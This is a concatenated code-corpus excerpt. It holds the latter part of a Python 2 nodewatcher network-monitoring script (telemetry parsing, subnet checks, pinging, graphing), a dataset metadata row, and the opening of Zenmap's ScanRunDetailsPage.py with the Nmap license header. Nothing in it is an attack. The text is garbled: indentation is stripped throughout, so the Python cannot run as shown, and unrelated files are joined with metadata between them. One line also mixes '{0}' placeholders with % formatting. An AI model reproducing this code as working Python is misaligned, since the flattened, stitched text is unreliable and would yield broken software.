Event.create_event(n, EventCode.ChannelChanged, '', EventSource.Monitor, data = 'Old channel: %s\n New channel %s' % (oldChannel, n.channel))
try:
if n.channel != n.profile.channel:
NodeWarning.create(n, WarningCode.ChannelMismatch, EventSource.Monitor)
except Profile.DoesNotExist:
pass
if n.has_time_sync_problems():
NodeWarning.create(n, WarningCode.TimeOutOfSync, EventSource.Monitor)
if 'errors' in info['wifi']:
error_count = safe_int_convert(info['wifi']['errors'])
if error_count != n.wifi_error_count and error_count > 0:
Event.create_event(n, EventCode.WifiErrors, '', EventSource.Monitor, data = 'Old count: %s\n New count: %s' % (n.wifi_error_count, error_count))
n.wifi_error_count = error_count
if 'net' in info:
loss_count = safe_int_convert(info['net']['losses']) if 'losses' in info['net'] else 0
if loss_count != n.loss_count and loss_count > 1:
Event.create_event(n, EventCode.ConnectivityLoss, '', EventSource.Monitor, data = 'Old count: %s\n New count: %s' % (n.loss_count, loss_count))
n.loss_count = loss_count
# Check VPN configuration
if 'vpn' in info['net']:
n.vpn_mac = info['net']['vpn']['mac'] or None
try:
offset = -3
unit = 1000
if 'Kbit' in info['net']['vpn']['upload_limit']:
offset = -4
unit = 1
upload_limit = safe_int_convert(info['net']['vpn']['upload_limit'][:offset]) // unit
except TypeError:
upload_limit = None
if n.vpn_mac and n.vpn_mac != n.vpn_mac_conf:
NodeWarning.create(n, WarningCode.VPNMacMismatch, EventSource.Monitor)
try:
if upload_limit != n.profile.vpn_egress_limit:
NodeWarning.create(n, WarningCode.VPNLimitMismatch, EventSource.Monitor)
except Profile.DoesNotExist:
pass
# Parse nodogsplash client information
oldNdsStatus = n.captive_portal_status
if 'nds' in info:
if 'down' in info['nds'] and info['nds']['down'] == '1':
n.captive_portal_status = False
# Create a node warning when captive portal is down and the node has it
# selected in its image generator profile
try:
if n.project.captive_portal and n.has_client_subnet():
NodeWarning.create(n, WarningCode.CaptivePortalDown, EventSource.Monitor)
except Profile.DoesNotExist:
pass
else:
n.captive_portal_status = True
for cid, client in info['nds'].iteritems():
if not cid.startswith('client'):
continue
try:
c = APClient.objects.get(node = n, ip = client['ip'])
except APClient.DoesNotExist:
c = APClient(node = n)
n.clients_so_far += 1
n.clients += 1
c.ip = client['ip']
c.connected_at = safe_date_convert(client['added_at'])
c.uploaded = safe_int_convert(client['up'])
c.downloaded = safe_int_convert(client['down'])
c.last_update = datetime.now()
c.save()
else:
n.captive_portal_status = True
# Check for captive portal status change
if n.has_client_subnet():
if oldNdsStatus and not n.captive_portal_status:
Event.create_event(n, EventCode.CaptivePortalDown, '', EventSource.Monitor)
elif not oldNdsStatus and n.captive_portal_status:
Event.create_event(n, EventCode.CaptivePortalUp, '', EventSource.Monitor)
# Generate a graph for number of wifi cells
if 'cells' in info['wifi']:
grapher.add_graph(GraphType.WifiCells, 'Nearby WiFi Cells', 'wificells', safe_int_convert(info['wifi']['cells']) or 0)
# Update node's MAC address on wifi iface
if 'mac' in info['wifi']:
n.wifi_mac = info['wifi']['mac']
# Update node's RTS and fragmentation thresholds
if 'rts' in info['wifi'] and 'frag' in info['wifi']:
n.thresh_rts = safe_int_convert(info['wifi']['rts']) or 2347
n.thresh_frag = safe_int_convert(info['wifi']['frag']) or 2347
# Check node's multicast rate
if 'mcast_rate' in info['wifi']:
rate = safe_int_convert(info['wifi']['mcast_rate'])
if rate != 5500:
NodeWarning.create(n, WarningCode.McastRateMismatch, EventSource.Monitor)
# Check node's wifi bitrate, level and noise
if 'signal' in info['wifi']:
bitrate = safe_int_convert(info['wifi']['bitrate'])
signal = safe_dbm_convert(info['wifi']['signal'])
noise = safe_dbm_convert(info['wifi']['noise'])
snr = float(signal) - float(noise)
grapher.add_graph(GraphType.WifiBitrate, 'WiFi Bitrate', 'wifibitrate', bitrate)
grapher.add_graph(GraphType.WifiSignalNoise, 'WiFi Signal/Noise', 'wifisignalnoise', signal, noise)
grapher.add_graph(GraphType.WifiSNR, 'WiFi Signal/Noise Ratio', 'wifisnr', snr)
# Check for IP shortage
wifi_subnet = n.subnet_set.filter(gen_iface_type = IfaceType.WiFi, allocated = True)
if wifi_subnet and n.clients > max(0, ipcalc.Network(wifi_subnet[0].subnet, wifi_subnet[0].cidr).size() - 4):
Event.create_event(n, EventCode.IPShortage, '', EventSource.Monitor, data = 'Subnet: %s\n Clients: %s' % (wifi_subnet[0], n.clients))
NodeWarning.create(n, WarningCode.IPShortage, EventSource.Monitor)
# Fetch DHCP leases when available
lease_count = 0
if 'dhcp' in info:
per_subnet_counts = {}
for cid, client in info['dhcp'].iteritems():
if not cid.startswith('client'):
continue
# Determine which subnet this thing belongs to
client_subnet = n.subnet_set.ip_filter(ip_subnet__contains = client['ip'])
if client_subnet:
client_subnet = client_subnet[0]
per_subnet_counts[client_subnet] = per_subnet_counts.get(client_subnet, 0) + 1
else:
# TODO Subnet is not announced by this node - potential problem, but ignore for now
pass
lease_count += 1
# Check for IP shortage
for client_subnet, count in per_subnet_counts.iteritems():
if count > ipcalc.Network(client_subnet.subnet, client_subnet.cidr).size() - 4:
Event.create_event(n, EventCode.IPShortage, '', EventSource.Monitor, data = 'Subnet: {0}\n Leases: {1}' % (client_subnet, count))
NodeWarning.create(n, WarningCode.IPShortage, EventSource.Monitor)
# Generate a graph for number of clients
if 'nds' in info or lease_count > 0:
grapher.add_graph(GraphType.Clients, 'Connected Clients', 'clients', n.clients, lease_count)
# Record interface traffic statistics for all interfaces
for iid, iface in info['iface'].iteritems():
if iid not in ('wifi0', 'wmaster0'):
# Check mappings for known wifi interfaces so we can handle hardware changes while
# the node is up and not generate useless intermediate graphs
try:
if n.profile:
iface_wifi = n.profile.template.iface_wifi
if Template.objects.filter(iface_wifi = iid).count() >= 1:
iid = iface_wifi
except Profile.DoesNotExist:
pass
grapher.add_graph(GraphType.Traffic, 'Traffic - %s' % iid, 'traffic_%s' % iid, iface['up'], iface['down'], name = iid)
# Generate load average statistics
if 'loadavg' in info['general']:
n.loadavg_1min, n.loadavg_5min, n.loadavg_15min, n.numproc = safe_loadavg_convert(info['general']['loadavg'])
grapher.add_graph(GraphType.LoadAverage, 'Load Average', 'loadavg', n.loadavg_1min, n.loadavg_5min, n.loadavg_15min)
grapher.add_graph(GraphType.NumProc, 'Number of Processes', 'numproc', n.numproc)
# Generate free memory statistics
if 'memfree' in info['general']:
n.memfree = safe_int_convert(info['general']['memfree'])
buffers = safe_int_convert(info['general'].get('buffers', 0))
cached = safe_int_convert(info['general'].get('cached', 0))
grapher.add_graph(GraphType.MemUsage, 'Memory Usage', 'memusage', n.memfree, buffers, cached)
# Generate solar statistics when available
if 'solar' in info and all([x in info['solar'] for x in ('batvoltage', 'solvoltage', 'charge', 'state', 'load')]):
states = {
'boost' : 1,
'equalize' : 2,
'absorption' : 3,
'float' : 4
}
for key, value in info['solar'].iteritems():
if not value.strip():
info['solar'][key] = None
grapher.add_graph(GraphType.Solar, 'Solar Monitor', 'solar',
info['solar']['batvoltage'],
info['solar']['solvoltage'],
info['solar']['charge'],
states.get(info['solar']['state']),
info['solar']['load']
)
# Generate statistics for environmental data
if 'environment' in info:
for key, value in info['environment'].iteritems():
if not key.startswith('sensor'):
continue
if 'temp' in value:
temp = safe_float_convert(value['temp'])
serial = value['serial']
grapher.add_graph(GraphType.Temperature, 'Temperature ({0})'.format(serial), 'temp_{0}'.format(serial), temp, name = serial)
# XXX UGLY HACK: Some random voltage reports
if 'voltage' in info:
serial = info['voltage']['serial']
voltages = [safe_float_convert(info['voltage'][x].strip()) for x in '1234']
multipliers = [safe_int_convert(info['voltage']['%sm' % x].strip()) for x in '1234']
results = []
for voltage, multiplier in zip(voltages, multipliers):
if voltage is not None:
results.append(voltage * multiplier)
else:
results.append(None)
grapher.add_graph(GraphType.Voltage, 'Voltage ({0})'.format(serial), 'volt_{0}'.format(serial), *results, name = serial)
# Check for installed package versions (every hour)
try:
last_pkg_update = n.installedpackage_set.all()[0].last_update
except:
last_pkg_update = None
if not last_pkg_update or last_pkg_update < datetime.now() - timedelta(hours = 1):
packages = nodewatcher.fetch_installed_packages(n.ip) or {}
# Remove removed packages and update existing package versions
for package in n.installedpackage_set.all():
if package.name not in packages:
package.delete()
else:
package.version = packages[package.name]
package.last_update = datetime.now()
package.save()
del packages[package.name]
# Add added packages
for packageName, version in packages.iteritems():
package = InstalledPackage(node = n)
package.name = packageName
package.version = version
package.last_update = datetime.now()
package.save()
# Check if all selected optional packages are present in package listing
try:
missing_packages = []
for package in n.profile.optional_packages.all():
for pname in package.name.split():
if n.installedpackage_set.filter(name = pname).count() == 0:
missing_packages.append(pname)
if missing_packages:
NodeWarning.create(n, WarningCode.OptPackageNotFound, EventSource.Monitor, details = ("Packages missing: %s" % ", ".join(missing_packages)))
except Profile.DoesNotExist:
pass
# Check if DNS works
if 'dns' in info:
old_dns_works = n.dns_works
n.dns_works = info['dns']['local'] == '0' and info['dns']['remote'] == '0'
if not n.dns_works:
NodeWarning.create(n, WarningCode.DnsDown, EventSource.Monitor)
if old_dns_works != n.dns_works:
# Generate a proper event when the state changes
if n.dns_works:
Event.create_event(n, EventCode.DnsResolverRestored, '', EventSource.Monitor)
else:
Event.create_event(n, EventCode.DnsResolverFailed, '', EventSource.Monitor)
except:
logging.warning("Failed to interpret nodewatcher data for node '%s (%s)'!" % (n.name, n.ip))
logging.warning(format_exc())
NodeWarning.create(n, WarningCode.NodewatcherInterpretFailed, EventSource.Monitor)
n.save()
# When GC debugging is enabled perform some more work
if getattr(settings, 'MONITOR_ENABLE_GC_DEBUG', None):
gc.collect()
return os.getpid(), len(gc.get_objects())
return None, None
@transaction.commit_on_success
def check_network_status():
"""
Performs the network status check.
"""
# Initialize the state of nodes and subnets, remove out of date ap clients and graph items
Node.objects.all().update(visible = False)
Subnet.objects.all().update(visible = False)
Link.objects.all().update(visible = False)
APClient.objects.filter(last_update__lt = datetime.now() - timedelta(minutes = 11)).delete()
# Reset some states
NodeWarning.objects.all().update(source = EventSource.Monitor, dirty = False)
Node.objects.all().update(warnings = False, conflicting_subnets = False)
# Fetch routing tables from OLSR
try:
nodes, hna = wifi_utils.get_tables(settings.MONITOR_OLSR_HOST)
except TypeError:
logging.error("Unable to fetch routing tables from '%s'!" % settings.MONITOR_OLSR_HOST)
return
# Ping nodes present in the database and visible in OLSR
dbNodes = {}
nodesToPing = []
for nodeIp in nodes.keys():
try:
# Try to get the node from the database
n = Node.get_exclusive(ip = nodeIp)
n.visible = True
n.peers = len(nodes[nodeIp].links)
# If we have succeeded, add to list (if not invalid)
if not n.is_invalid():
if n.awaiting_renumber:
# Reset any status from awaiting renumber to invalid
for notice in n.renumber_notices.all():
try:
rn = Node.objects.get(ip = notice.original_ip)
if rn.status == NodeStatus.AwaitingRenumber:
rn.status = NodeStatus.Invalid
rn.node_type = NodeType.Unknown
rn.awaiting_renumber = False
rn.save()
except Node.DoesNotExist:
pass
notice.delete()
n.awaiting_renumber = False
n.save()
nodesToPing.append(nodeIp)
else:
n.last_seen = datetime.now()
n.peers = len(nodes[nodeIp].links)
# Create a warning since node is not registered
NodeWarning.create(n, WarningCode.UnregisteredNode, EventSource.Monitor)
n.save()
dbNodes[nodeIp] = n
except Node.DoesNotExist:
# Node does not exist, create an invalid entry for it
n = Node(ip = nodeIp, status = NodeStatus.Invalid, last_seen = datetime.now())
n.visible = True
n.node_type = NodeType.Unknown
n.peers = len(nodes[nodeIp].links)
# Check if there are any renumber notices for this IP address
try:
notice = RenumberNotice.objects.get(original_ip = nodeIp)
n.status = NodeStatus.AwaitingRenumber
n.node_type = notice.node.node_type
n.awaiting_renumber = True
except RenumberNotice.DoesNotExist:
pass
n.save(force_insert = True)
dbNodes[nodeIp] = n
# Create an event and append a warning since an unknown node has appeared
NodeWarning.create(n, WarningCode.UnregisteredNode, EventSource.Monitor)
Event.create_event(n, EventCode.UnknownNodeAppeared, '', EventSource.Monitor)
# Add a warning to all nodes that have been stuck in renumbering state for over a week
for node in Node.objects.filter(renumber_notices__renumbered_at__lt = datetime.now() - timedelta(days = 7)):
NodeWarning.create(node, WarningCode.LongRenumber, EventSource.Monitor)
node.save()
# Mark invisible nodes as down
for node in Node.objects.exclude(status__in = (NodeStatus.Invalid, NodeStatus.AwaitingRenumber)):
oldStatus = node.status
if node.ip not in dbNodes:
if node.status == NodeStatus.New:
node.status = NodeStatus.Pending
elif node.status != NodeStatus.Pending:
node.status = NodeStatus.Down
node.save()
if oldStatus in (NodeStatus.Up, NodeStatus.Visible, NodeStatus.Duped) and node.status == NodeStatus.Down:
Event.create_event(node, EventCode.NodeDown, '', EventSource.Monitor)
# Invalidate uptime credit for this node
node.uptime_last = None
node.save()
# Generate timestamp and snapshot identifier
timestamp = datetime.now()
snapshot_id = int(time.time())
# Setup all node peerings
for nodeIp, node in nodes.iteritems():
n = dbNodes[nodeIp]
n.redundancy_link = False
links = []
# Find old VPN server peers
old_vpn_peers = set([p.dst for p in n.get_peers().filter(dst__vpn_server = True)])
for peerIp, lq, ilq, etx, vtime in node.links:
try:
l = Link.objects.get(src = n, dst = dbNodes[peerIp])
except Link.DoesNotExist:
l = Link(src = n, dst = dbNodes[peerIp])
l.lq = float(lq)
l.ilq = float(ilq)
l.etx = float(etx)
l.vtime = vtime
l.visible = True
l.save()
links.append(l)
# Check if any of the peers has never peered with us before
if n.is_adjacency_important() and l.dst.is_adjacency_important() and not n.peer_history.filter(pk = l.dst.pk).count():
n.peer_history.add(l.dst)
Event.create_event(n, EventCode.AdjacencyEstablished, '', EventSource.Monitor,
data = 'Peer node: %s' % l.dst, aggregate = False)
Event.create_event(l.dst, EventCode.AdjacencyEstablished, '', EventSource.Monitor,
data = 'Peer node: %s' % n, aggregate = False)
# Check if we have a peering with any VPN servers
if l.dst.vpn_server:
n.redundancy_link = True
if not n.is_invalid():
# Determine new VPN server peers
new_vpn_peers = set([p.dst for p in n.get_peers().filter(visible = True, dst__vpn_server = True)])
if old_vpn_peers != new_vpn_peers:
for p in old_vpn_peers:
if p not in new_vpn_peers:
# Redundancy loss has ocurred
Event.create_event(n, EventCode.RedundancyLoss, '', EventSource.Monitor,
data = 'VPN server: %s' % p)
for p in new_vpn_peers:
if p not in old_vpn_peers:
# Redundancy restoration has ocurred
Event.create_event(n, EventCode.RedundancyRestored, '', EventSource.Monitor,
data = 'VPN server: %s' % p)
# Issue a warning when node requires peering but has none
if n.redundancy_req and not n.redundancy_link:
NodeWarning.create(n, WarningCode.NoRedundancy, EventSource.Monitor)
n.save()
# Archive topology information
data_archive.record_topology_entry(snapshot_id, timestamp, n, links)
# Update valid subnet status in the database
for nodeIp, subnets in hna.iteritems():
if nodeIp not in dbNodes:
continue
for subnet in subnets:
subnet, cidr = subnet.split("/")
try:
s = Subnet.objects.get(node__ip = nodeIp, subnet = subnet, cidr = int(cidr))
s.last_seen = datetime.now()
s.visible = True
except Subnet.DoesNotExist:
s = Subnet(node = dbNodes[nodeIp], subnet = subnet, cidr = int(cidr), last_seen = datetime.now())
s.visible = True
s.allocated = False
# Save previous subnet status for later use
old_status = s.status
# Set status accoording to allocation flag
if s.allocated:
s.status = SubnetStatus.AnnouncedOk
else:
s.status = SubnetStatus.NotAllocated
# Check if this is a more specific prefix announce for an allocated prefix
if s.is_more_specific() and not s.allocated:
s.status = SubnetStatus.Subset
# Check if this is a hijack
try:
origin = Subnet.objects.ip_filter(
# Subnet overlaps with another one
ip_subnet__contains = '%s/%s' % (subnet, cidr)
).exclude(
# Of another node (= filter all subnets belonging to current node)
node = s.node
).get(
# That is allocated and visible
allocated = True,
visible = True
)
s.status = SubnetStatus.Hijacked
except Subnet.DoesNotExist:
pass
# Generate an event if status has changed
if old_status != s.status and s.status == SubnetStatus.Hijacked:
Event.create_event(n, EventCode.SubnetHijacked, '', EventSource.Monitor,
data = 'Subnet: %s/%s\n Allocated to: %s' % (s.subnet, s.cidr, origin.node))
# Flag node entry with warnings flag for unregistered announces
if not s.is_properly_announced():
if s.node.border_router and not s.is_from_known_pool():
# TODO when we have peering announce registration this should first check if
# the subnet is registered as a peering
s.status = SubnetStatus.Peering
if not s.node.border_router or s.status == SubnetStatus.Hijacked or s.is_from_known_pool():
# Add a warning message for unregistered announced subnets
NodeWarning.create(s.node, WarningCode.UnregisteredAnnounce, EventSource.Monitor)
s.node.save()
s.save()
# Detect subnets that cause conflicts and raise warning flags for all involved
# nodes
if s.is_conflicting():
NodeWarning.create(s.node, WarningCode.AnnounceConflict, EventSource.Monitor)
s.node.conflicting_subnets = True
s.node.save()
for cs in s.get_conflicting_subnets():
NodeWarning.create(cs.node, WarningCode.AnnounceConflict, EventSource.Monitor)
cs.node.conflicting_subnets = True
cs.node.save()
# Remove subnets that were hijacked but are not visible anymore
for s in Subnet.objects.filter(status = SubnetStatus.Hijacked, visible = False):
Event.create_event(s.node, EventCode.SubnetRestored, '', EventSource.Monitor, data = 'Subnet: %s/%s' % (s.subnet, s.cidr))
s.delete()
# Remove (or change their status) subnets that are not visible
Subnet.objects.filter(allocated = False, visible = False).delete()
Subnet.objects.filter(allocated = True, visible = False).update(status = SubnetStatus.NotAnnounced)
for subnet in Subnet.objects.filter(status = SubnetStatus.NotAnnounced, node__visible = True):
NodeWarning.create(subnet.node, WarningCode.OwnNotAnnounced, EventSource.Monitor)
subnet.node.save()
# Remove invisible unknown nodes
for node in Node.objects.filter(status = NodeStatus.Invalid, visible = False).all():
# Create an event since an unknown node has disappeared
Event.create_event(node, EventCode.UnknownNodeDisappeared, '', EventSource.Monitor)
Node.objects.filter(status__in = (NodeStatus.Invalid, NodeStatus.AwaitingRenumber), visible = False).delete()
# Remove invisible links
Link.objects.filter(visible = False).delete()
# Add nodes to topology map and generate output
if not getattr(settings, 'MONITOR_DISABLE_GRAPHS', None):
# Only generate topology when graphing is not disabled
topology = DotTopologyPlotter()
for node in dbNodes.values():
topology.addNode(node)
topology.save(os.path.join(settings.GRAPH_DIR, 'network_topology.png'), os.path.join(settings.GRAPH_DIR, 'network_topology.dot'))
# Ping the nodes to prepare information for later node processing
varsize_results = {}
results, dupes = wifi_utils.ping_hosts(10, nodesToPing)
for packet_size in (100, 500, 1000, 1480):
r, d = wifi_utils.ping_hosts(10, nodesToPing, packet_size - 8)
for node_ip in nodesToPing:
varsize_results.setdefault(node_ip, []).append(r[node_ip][3] if node_ip in r else None)
if getattr(settings, 'MONITOR_DISABLE_MULTIPROCESSING', None):
# Multiprocessing is disabled (the MONITOR_DISABLE_MULTIPROCESSING option is usually
# used for debug purpuses where a single process is prefered)
for node_ip in nodesToPing:
process_node(node_ip, results.get(node_ip), node_ip in dupes, nodes[node_ip].links, varsize_results.get(node_ip))
# Commit the transaction here since we do everything in the same session
transaction.commit()
else:
# We MUST commit the current transaction here, because we will be processing
# some transactions in parallel and must ensure that this transaction that has
# modified the nodes is commited. Otherwise this will deadlock!
transaction.commit()
worker_results = []
for node_ip in nodesToPing:
worker_results.append(
WORKER_POOL.apply_async(process_node, (node_ip, results.get(node_ip), node_ip in dupes, nodes[node_ip].links, varsize_results.get(node_ip)))
)
# Wait for all workers to finish processing
objects = {}
for result in worker_results:
try:
k, v = result.get()
objects[k] = v
except Exception, e:
logging.warning(format_exc())
# When GC debugging is enabled make some additional computations
if getattr(settings, 'MONITOR_ENABLE_GC_DEBUG', None):
global _MAX_GC_OBJCOUNT
objcount = sum(objects.values())
if '_MAX_GC_OBJCOUNT' not in globals():
_MAX_GC_OBJCOUNT = objcount
logging.debug("GC object count: %d %s" % (objcount, "!M" if objcount > _MAX_GC_OBJCOUNT else ""))
_MAX_GC_OBJCOUNT = max(_MAX_GC_OBJCOUNT, objcount)
# Cleanup all out of date warnings
NodeWarning.clear_obsolete_warnings(EventSource.Monitor)
if __name__ == '__main__':
# Configure logger
logging.basicConfig(level = logging.DEBUG,
format = '%(asctime)s %(levelname)-8s %(message)s',
datefmt = '%a, %d %b %Y %H:%M:%S',
filename = settings.MONITOR_LOGFILE,
filemode = 'a')
# Autodetect fping location
FPING_LOCATIONS = [
getattr(settings, 'FPING_BIN', None),
'/usr/sbin/fping',
'/usr/bin/fping',
'/sw/sbin/fping'
]
for fping_loc in FPING_LOCATIONS:
if not fping_loc:
continue
if os.path.isfile(fping_loc):
wifi_utils.FPING_BIN = fping_loc
logging.info("Found fping in %s." % fping_loc)
break
else:
print "ERROR: Failed to find fping binary! Check that it is installed properly."
exit(1)
# Autodetect graphviz location
GRAPHVIZ_LOCATIONS = [
getattr(settings, 'GRAPHVIZ_BIN', None),
'/usr/bin/neato',
'/sw/bin/neato'
]
for graphviz_loc in GRAPHVIZ_LOCATIONS:
if not graphviz_loc:
continue
if os.path.isfile(graphviz_loc):
DotTopologyPlotter.GRAPHVIZ_BIN = graphviz_loc
logging.info("Found graphviz in %s." % graphviz_loc)
break
else:
print "ERROR: Failed to find graphviz binary! Check that it is installed properly."
exit(1)
# Check if we should just update RRDs
if options.update_rrds:
print ">>> Updating RRDs..."
update_rrds()
print ">>> RRD updates completed."
exit(0)
# Check if we should just perform reverse population of RRDs
if options.reverse_populate:
try:
node = Node.objects.get(pk = options.rp_node)
except Node.DoesNotExist:
print "ERROR: Invalid node specified."
exit(1)
try:
conf = graphs.RRA_CONF_MAP[int(options.rp_graph)]
except (ValueError, KeyError):
print "ERROR: Invalid graph type specified."
exit(1)
print ">>> Reverse populating RRDs for node '%s', graph '%s'..." % (node.name, conf.__name__)
try:
graph = GraphItem.objects.filter(node = node, type = int(options.rp_graph))[0]
except IndexError:
print "ERROR: No graph items of specified type are available for this node."
exit(1)
archive = str(os.path.join(settings.MONITOR_WORKDIR, 'rra', graph.rra))
RRA.reverse_populate(node, conf, archive)
exit(0)
# Check if we should just perform stress testing
if options.stress_test:
print ">>> Performing stress test..."
# Force some settings
settings.MONITOR_ENABLE_SIMULATION = True
settings.MONITOR_DISABLE_MULTIPROCESSING = True
# Check network status in a tight loop
try:
for i in xrange(1000):
check_network_status()
check_dead_graphs()
check_events()
# Output progress messages
if i > 0 and i % 10 == 0:
print " > Completed %d iterations. (%d gc objects)" % (i, len(gc.get_objects()))
except KeyboardInterrupt:
print "!!! Aborted by user."
exit(1)
except:
print "!!! Unhandled exception."
print_exc()
exit(1)
print ">>> Stress test completed."
exit(0)
# Output warnings when debug mode is enabled
if getattr(settings, 'DEBUG', None):
logging.warning("Debug mode is enabled, monitor will leak memory!")
if getattr(settings, 'MONITOR_ENABLE_SIMULATION', None):
logging.warning("All feeds are being simulated!")
if getattr(settings, 'MONITOR_DISABLE_MULTIPROCESSING', None):
logging.warning("Multiprocessing mode disabled.")
if getattr(settings, 'MONITOR_DISABLE_GRAPHS', None):
logging.warning("Graph generation disabled.")
if getattr(settings, 'MONITOR_ENABLE_GC_DEBUG', None):
logging.warning("Garbage collection debugging enabled.")
# Create worker pool and start processing
logging.info("nodewatcher network monitoring system is initializing...")
WORKER_POOL = multiprocessing.Pool(processes = settings.MONITOR_WORKERS)
try:
while True:
# Perform all processing
ts_start = time.time()
try:
check_network_status()
check_dead_graphs()
check_global_statistics()
check_events()
except KeyboardInterrupt:
raise
except:
logging.warning(format_exc())
# Go to sleep for a while
ts_delta = time.time() - ts_start
if ts_delta > settings.MONITOR_POLL_INTERVAL // 2:
logging.warning("Processing took more than half of monitor poll interval ({0} sec)!".format(round(ts_delta, 2)))
ts_delta = settings.MONITOR_POLL_INTERVAL // 2
sleep(settings.MONITOR_POLL_INTERVAL - ts_delta)
except:
logging.warning("Terminating workers...")
WORKER_POOL.terminate()
|
agpl-3.0
| 7,879,637,176,988,811,000
| 36.925249
| 224
| 0.635846
| false
| 3.692843
| false
| false
| false
|
grongor/school_rfid
|
lib/nmap-6.40/zenmap/zenmapGUI/ScanRunDetailsPage.py
|
1
|
16962
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ***********************IMPORTANT NMAP LICENSE TERMS************************
# * *
# * The Nmap Security Scanner is (C) 1996-2013 Insecure.Com LLC. Nmap is *
# * also a registered trademark of Insecure.Com LLC. This program is free *
# * software; you may redistribute and/or modify it under the terms of the *
# * GNU General Public License as published by the Free Software *
# * Foundation; Version 2 ("GPL"), BUT ONLY WITH ALL OF THE CLARIFICATIONS *
# * AND EXCEPTIONS DESCRIBED HEREIN. This guarantees your right to use, *
# * modify, and redistribute this software under certain conditions. If *
# * you wish to embed Nmap technology into proprietary software, we sell *
# * alternative licenses (contact sales@insecure.com). Dozens of software *
# * vendors already license Nmap technology such as host discovery, port *
# * scanning, OS detection, version detection, and the Nmap Scripting *
# * Engine. *
# * *
# * Note that the GPL places important restrictions on "derivative works", *
# * yet it does not provide a detailed definition of that term. To avoid *
# * misunderstandings, we interpret that term as broadly as copyright law *
# * allows. For example, we consider an application to constitute a *
# * derivative work for the purpose of this license if it does any of the *
# * following with any software or content covered by this license *
# * ("Covered Software"): *
# * *
# * o Integrates source code from Covered Software. *
# * *
# * o Reads or includes copyrighted data files, such as Nmap's nmap-os-db *
# * or nmap-service-probes. *
# * *
# * o Is designed specifically to execute Covered Software and parse the *
# * results (as opposed to typical shell or execution-menu apps, which will *
# * execute anything you tell them to). *
# * *
# * o Includes Covered Software in a proprietary executable installer. The *
# * installers produced by InstallShield are an example of this. Including *
# * Nmap with other software in compressed or archival form does not *
# * trigger this provision, provided appropriate open source decompression *
# * or de-archiving software is widely available for no charge. For the *
# * purposes of this license, an installer is considered to include Covered *
# * Software even if it actually retrieves a copy of Covered Software from *
# * another source during runtime (such as by downloading it from the *
# * Internet). *
# * *
# * o Links (statically or dynamically) to a library which does any of the *
# * above. *
# * *
# * o Executes a helper program, module, or script to do any of the above. *
# * *
# * This list is not exclusive, but is meant to clarify our interpretation *
# * of derived works with some common examples. Other people may interpret *
# * the plain GPL differently, so we consider this a special exception to *
# * the GPL that we apply to Covered Software. Works which meet any of *
# * these conditions must conform to all of the terms of this license, *
# * particularly including the GPL Section 3 requirements of providing *
# * source code and allowing free redistribution of the work as a whole. *
# * *
# * As another special exception to the GPL terms, Insecure.Com LLC grants *
# * permission to link the code of this program with any version of the *
# * OpenSSL library which is distributed under a license identical to that *
# * listed in the included docs/licenses/OpenSSL.txt file, and distribute *
# * linked combinations including the two. *
# * *
# * Any redistribution of Covered Software, including any derived works, *
# * must obey and carry forward all of the terms of this license, including *
# * obeying all GPL rules and restrictions. For example, source code of *
# * the whole work must be provided and free redistribution must be *
# * allowed. All GPL references to "this License", are to be treated as *
# * including the special and conditions of the license text as well. *
# * *
# * Because this license imposes special exceptions to the GPL, Covered *
# * Work may not be combined (even as part of a larger work) with plain GPL *
# * software. The terms, conditions, and exceptions of this license must *
# * be included as well. This license is incompatible with some other open *
# * source licenses as well. In some cases we can relicense portions of *
# * Nmap or grant special permissions to use it in other open source *
# * software. Please contact fyodor@nmap.org with any such requests. *
# * Similarly, we don't incorporate incompatible open source software into *
# * Covered Software without special permission from the copyright holders. *
# * *
# * If you have any questions about the licensing restrictions on using *
# * Nmap in other works, are happy to help. As mentioned above, we also *
# * offer alternative license to integrate Nmap into proprietary *
# * applications and appliances. These contracts have been sold to dozens *
# * of software vendors, and generally include a perpetual license as well *
# * as providing for priority support and updates. They also fund the *
# * continued development of Nmap. Please email sales@insecure.com for *
# * further information. *
# * *
# * If you received these files with a written license agreement or *
# * contract stating terms other than the terms above, then that *
# * alternative license agreement takes precedence over these comments. *
# * *
# * Source is provided to this software because we believe users have a *
# * right to know exactly what a program is going to do before they run it. *
# * This also allows you to audit the software for security holes (none *
# * have been found so far). *
# * *
# * Source code also allows you to port Nmap to new platforms, fix bugs, *
# * and add new features. You are highly encouraged to send your changes *
# * to the dev@nmap.org mailing list for possible incorporation into the *
# * main distribution. By sending these changes to Fyodor or one of the *
# * Insecure.Org development mailing lists, or checking them into the Nmap *
# * source code repository, it is understood (unless you specify otherwise) *
# * that you are offering the Nmap Project (Insecure.Com LLC) the *
# * unlimited, non-exclusive right to reuse, modify, and relicense the *
# * code. Nmap will always be available Open Source, but this is important *
# * because the inability to relicense code has caused devastating problems *
# * for other Free Software projects (such as KDE and NASM). We also *
# * occasionally relicense the code to third parties as discussed above. *
# * If you wish to specify special license conditions of your *
# * contributions, just say so when you send them. *
# * *
# * This program is distributed in the hope that it will be useful, but *
# * WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the Nmap *
# * license file for more details (it's in a COPYING file included with *
# * Nmap, and also available from https://svn.nmap.org/nmap/COPYING *
# * *
# ***************************************************************************/
import gtk
from zenmapGUI.higwidgets.higboxes import HIGVBox, HIGHBox, hig_box_space_holder
from zenmapGUI.higwidgets.higtables import HIGTable
from zenmapGUI.higwidgets.higlabels import HIGEntryLabel
import zenmapCore.I18N
class ScanRunDetailsPage(HIGVBox):
def __init__(self, scan):
HIGVBox.__init__(self)
na = _('Not available')
# Command info
self.command_label = HIGEntryLabel(_('Command:'))
self.info_command_label = HIGEntryLabel(na)
self.nmap_version_label = HIGEntryLabel(_('Nmap Version:'))
self.info_nmap_version_label = HIGEntryLabel(na)
self.verbose_label = HIGEntryLabel(_('Verbosity level:'))
self.info_verbose_label = HIGEntryLabel(na)
self.debug_label = HIGEntryLabel(_('Debug level:'))
self.info_debug_label = HIGEntryLabel(na)
self.command_expander = gtk.Expander("<b>"+_("Command Info")+"</b>")
self.command_expander.set_use_markup(True)
self.command_table = HIGTable()
self.command_table.set_border_width(5)
self.command_table.set_row_spacings(6)
self.command_table.set_col_spacings(6)
self.command_hbox = HIGHBox()
self.command_hbox._pack_noexpand_nofill(hig_box_space_holder())
self.command_hbox._pack_noexpand_nofill(self.command_table)
self.command_table.attach(self.command_label,0,1,0,1)
self.command_table.attach(self.info_command_label,1,2,0,1)
self.command_table.attach(self.nmap_version_label,0,1,1,2)
